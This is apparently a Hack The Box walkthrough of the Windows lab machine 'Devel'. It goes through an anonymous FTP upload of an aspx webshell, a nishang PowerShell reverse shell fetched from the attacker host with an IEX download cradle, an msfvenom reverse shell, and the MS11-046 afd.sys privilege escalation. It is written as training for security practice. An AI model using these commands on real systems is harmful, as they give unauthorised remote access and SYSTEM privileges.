DEVEL(Windows)
Key takeaways:
- FTP anonymous login
- Write on Ftp server that has access to web server files
- Aspx shell upload for foothold
- ‘afd.sys’ Local Privilege Escalation (MS11–046)
Enumeration
Port scanning using nmap
sudo nmap -sC -sV -Pn -v -oN nmap devel.htb
Nmap scan report for devel.htb (10.10.10.5)
Host is up (0.17s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03–18–17 02:06AM <DIR> aspnet_client
| 03–17–17 05:37PM 689 iisstart.htm
|_03–17–17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsWe can see port 21-ftp and anonymous login allowed. The ftp server also contains some files inside. Lets look into it further.
Logging in to ftp using anonymous user we get the same results as above
Seems interesting, it looks like the default IIS website. Lets take a look at the website first, since port 80 is open
From above image we see welcome.png , the same file that is found on the ftp server. This could mean that we have access to the server files.
Next is checking whether we have read write access to the ftp server directory.
We can try uploading an aspx file to see whether we can access it on the web server.
First I copied an aspx webshell to my devel folder.
NB:I did not use an Asp web-shell because i could not run commands with it(asp is not compatible by default on IIS7 and above)
cp /usr/share/webshells/aspx/cmdasp.aspx ~/Desktop/oscp/hackthebox/develThen i uploaded it onto the ftp server
Lets try accessing it through the web-server
Running whoami, we see user iis apppool user(iis application pool identity allows you to run iis application without having to create and manage domain or local accounts)
Initial Access
Lets try getting a shell
first we will copy a nishang powershell script
cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 .I then edited the script and added the below command for a reverse shell
From my terminal, i created a python server that host the Invoke-PowershellTcp.ps1 script.
Then created a nc listener with the below command
nc -nlvp 444From the web-server i input the below command and waited for a reverse connection.
cmd /c powershell -c IEX (New-Object Net.WebClient).downloadstring('http://10.10.14.4:80/Invoke-PowerShellTcp.ps1')
A reverse connection was successful
Running net user we see users babis and Administrator
I could not access babis nor administrator directories
Running systeminfo we see that its a windows 7 Enterprise build 7600 and its x86 based pc
Privilege Escalation
Googling around for the version, we see that it has an exploit
https://www.exploit-db.com/exploits/40564
The exploit takes advantage of the afd.sys driver which runs in kernel mode and manages the Winsock TCP/IP communications protocol. Privilege escalation vulnerability exists where the AFD improperly validates input passed from user mode to the kernel
Lets compile the c program
After compiling, i uploaded the file to windows c:\windows\temp folder
I created a smb server to serve the executable file
sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py tools .
[sudo] password for kali:
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
Then using copy i accessed and copied exe file from the created smb server.
copy \\10.10.14.4\tools\MS11–046.exeRunning the executable file
I found out that the system shell was exiting and i could not escalate to system. Let me try changing my powershell terminal to a standard terminal and try it out again.
For this, i created an msfvenom reverse executable
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.4 LPORT=4444 EXITFUN
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: rev.exeThen downloaded it to the windows machine as before.
Running it, i was able to get a standard shell
Now running the exploit once more
User.txt
Root.txt
Lessons Learnt
Some executable files might not run on a powershell terminal, change the terminal to a standard terminal first or rather you can use a non powershell reverse shell script for the initial access to spare you all the hustle.
